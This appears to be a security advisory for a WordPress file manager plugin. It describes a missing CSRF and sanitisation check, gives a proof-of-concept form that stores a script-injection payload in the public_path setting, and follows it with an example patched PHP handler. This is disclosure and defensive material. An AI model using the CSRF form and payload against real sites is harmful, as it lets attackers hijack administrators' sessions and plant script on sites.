The plugin lacks CSRF and sanitisation checks, allowing attackers to perform CSRF attacks against logged-in administrators and set an XSS payload in the public_path setting.
<form method="POST" action="https://example.com/wp-admin/admin.php?page=wp_file_manager_root">
<input type="text" name="public_path" value="%22%3E%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E"><br />
<input type="text" name="submit" value="Save Changes"><br />
<input type="submit">
</form>
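
For comparison, a settings handler with the missing checks in place. This is an added example, not the plugin's own code: the function names, nonce action and field, and option key are hypothetical, and only the page slug and the public_path field come from the proof of concept above.

```php
<?php
// Added example: the names below are assumptions, not taken from the plugin.
const FM_NONCE_ACTION = 'fm_save_root_settings'; // hypothetical nonce action
const FM_NONCE_FIELD  = 'fm_root_nonce';         // hypothetical nonce field
const FM_OPTION       = 'fm_root_settings';      // hypothetical option key

// Save handler: only acts on POSTs to the settings page seen in the PoC.
function fm_save_root_settings() {
    $page = isset( $_GET['page'] ) ? sanitize_key( wp_unslash( $_GET['page'] ) ) : '';
    if ( 'wp_file_manager_root' !== $page || ! isset( $_POST['submit'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF check: dies unless the request carries a valid nonce for this action.
    // The cross-site form above has no way to obtain one.
    check_admin_referer( FM_NONCE_ACTION, FM_NONCE_FIELD );

    // Sanitise on input: strips tags and control characters.
    $public_path = isset( $_POST['public_path'] )
        ? sanitize_text_field( wp_unslash( $_POST['public_path'] ) )
        : '';
    update_option( FM_OPTION, array( 'public_path' => $public_path ) );
}
add_action( 'admin_init', 'fm_save_root_settings' );

// Settings form: emits the nonce and escapes the stored value on output.
function fm_render_root_settings() {
    $settings = get_option( FM_OPTION, array() );
    $value    = isset( $settings['public_path'] ) ? $settings['public_path'] : '';
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( FM_NONCE_ACTION, FM_NONCE_FIELD ); ?>
        <!-- esc_attr() is what stops a stored quote from closing the attribute -->
        <input type="text" name="public_path" value="<?php echo esc_attr( $value ); ?>">
        <input type="submit" name="submit" value="Save Changes">
    </form>
    <?php
}
```

The nonce check addresses the CSRF half of the issue and the output escaping addresses the XSS half; sanitising on input alone leaves a bare double quote in the stored value, so both the input and output steps are needed.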